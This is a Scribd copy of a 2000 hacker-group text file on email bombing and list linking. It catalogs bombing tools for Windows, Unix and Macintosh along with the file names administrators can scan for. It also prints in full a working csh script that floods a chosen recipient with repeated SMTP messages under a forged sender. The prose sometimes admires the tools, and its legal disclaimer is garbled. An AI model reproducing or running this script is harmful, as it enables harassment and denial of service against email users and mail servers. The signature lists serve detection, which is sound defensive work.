Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
1Activity
0 of .
Results for:
No results containing your search query
P. 1
Mail Bombing and List Linking

Mail Bombing and List Linking

Ratings: (0)|Views: 111|Likes:
Published by mobilecrackers

More info:

Published by: mobilecrackers on Jul 29, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as TXT, PDF, TXT or read online from Scribd
See more
See less

03/14/2014

pdf

text

original

 
=============================Mail Bombing and List Linking=============================by Tolda [2000]With comments and additions by R a v e N.Written for BSRF.Homepage: http://blacksun.box.skImportant Note==============The writers of this article nor BSRF believe that mail bombing andlist linking are against the law, and should not be carried out nortolerated by anyone. In fact, these are two of the dumbest things youcould do on the net, and will only get you mocked. Such attacks areonly carried out by kids with too much time in their hands, who arenot smart enough to carry out more sophisticated attacks.Know Your Enemy===============Up Yours: The Up Yours mail-bombing program is probably the most popular bomberout there. It uses minimal resources, does a superb job, has a simpleuser interface, and attempts to obscure the attacker's sourceaddress. Features of the program include being able to specify timesof day to start and stop as well as the number of messages with whichit will hammer the target. This bomber runs only on the Microsoft Windows platform. If you are asystem administrator, you will want to scan your local drives for thefollowing files: upyours.exeupyours2.zipupyours3.zip If these files appear in a user's directory, there is a stronglikelihood that he is about to e-mail bomb someone (of course,perhaps he simply spends his time collecting hacking and crackingprograms). In any event, the utility is hard to find. If one of yourusers has acquired this program, he clearly has an interest inhacking or cracking :o) KaBoom: KaBoom differs significantly from Up Yours. In the main program, youfind a utility to list link. Using this function, you can subscribeyour target to hundreds of e-mail lists. When I say that a target hasbeen list-linked, I mean the target has been subscribed (without hisconsent) to one or more mailing lists. Such tools submit registrationrequests on behalf of the victim, forging his e-mail address. In anyevent, this utility's signature files are these: kaboom!3.zipkaboom3.exe Avalanche: The Avalanche e-mail bombing utility works smoothly and is well
 
designed. The list groups are displayed in a drop-down combo box, andtheir individual lists are displayed in a list box. Three clicks of amouse and your target is in hot water. TIP: The programmer here was a bit absentminded. The program waswritten at least in part in Microsoft Visual Basic 4.0. As such,there are a series of DLL files that are required to run theapplication. These are missing from the general distribution of thisutility; therefore, serious bombers must go out onto the Internet toretrieve those files (one is OC2.DLL). Because of this, I wouldestimate that Avalanche is probably used less than its counterparts,even though its overall design is superior. Inconvenience discouragesmost users of this particular ilk. The signature files for thisproduct are: alanch10.zipavalanche20.zipavalanche.exe Unabomber: The Unabomber utility is a rudimentary tool, but one must give theauthor credit for humor. Unabomber offers no list-linkingcapabilities. It is essentially a flat e-mail bomber and does no morethan send messages over and over. One interesting element is thatUnabomber comes with a help function. The signature files for thisutility are: unabomb.zipunabomb.exe eXtreme Mail: eXtreme Mail is well programmed. It includes an interactiveinstallation process that performs all the routine checks for diskspace, resources, and so forth. It also observes proper registryconventions and is easily uninstalled.The signature files for this product are: xmailb1.zipxmailb1.exe Homicide: The Homicide utility was written by a youngster with the moniker Frysand was discontinued in 1996. The author claims that he wrote theutility because Up Yours 2.0 was inadequate as an e-mail bombingtool. However, with the release of Up Yours 3.0, Frys apparentlydecided to discontinue any further releases. As of March 1997, it isavailable only at a very few select sites.The signature files for this utility are: homicide.ziphomicide.exe The UNIX MailBomb: This UNIX e-mail bomber is reportedly written by CyberGoat, ananonymous cracker out in the void. The signature file on this one ismailbomb.csh.
 
It is in fact a CSH shell script and not a program, since Unix hassuch powerful shells and shell scripting capabilities. It's mainadvantage is that it is very small in size. #!/bin/csh# Anonymous Mailbomber# do chmod u+rwx <filename> where filename is the name of the filethat# you saved it as.#*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED# "teltemp"# IN THE DIRECTORY IT IS RUN FROM ****clearecho -n "What is the name or address of the smtp server ?"set server = $<#echo open $server 25 > teltempecho quote helo somewhere.com >> teltemp#The entry for the following should be a single name (goober),#not goober@internet.address <mailto:goober@internet.address>.echo -n "Who will this be from (e.g. somebody) ?"set from = $<echo quote mail from: $from >> teltempecho -n "Who is the lucky recipient (e.g. someone@somewhere) ? "set name = $<echo quote rcpt to: $name >> teltempecho quote data >> teltempecho quote . >> teltempecho quote quit >> teltempecho quit >> teltempecho -n "How many times should it be sent ?"set amount = $<set loop_count = 1while ($loop_count <= $amount)echo "Done $loop_count"ftp -n $server 25 < teltemp@ loop_count++endrm ./teltempecho $amount e-mails complete to $name from $from@$server# --------------------# MailBomb by CyBerGoAT Bombtrack: The Bombtrack utility is reportedly the first mail-bombing toolwritten for the Macintosh platform. It is another run-of-the-millbombing utility, widely available at cracker sites across theInternet. The signature file for this application is: bombtrack.bin FlameThrower: FlameThrower is a bombing utility written for Macintosh. Its mainpurpose is list linking; it allows the user to subscribe his targetto 100 lists. The binary is quite large, considering its intendedpurpose. The signature for this file is: flamethrower10b.sit.bin

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->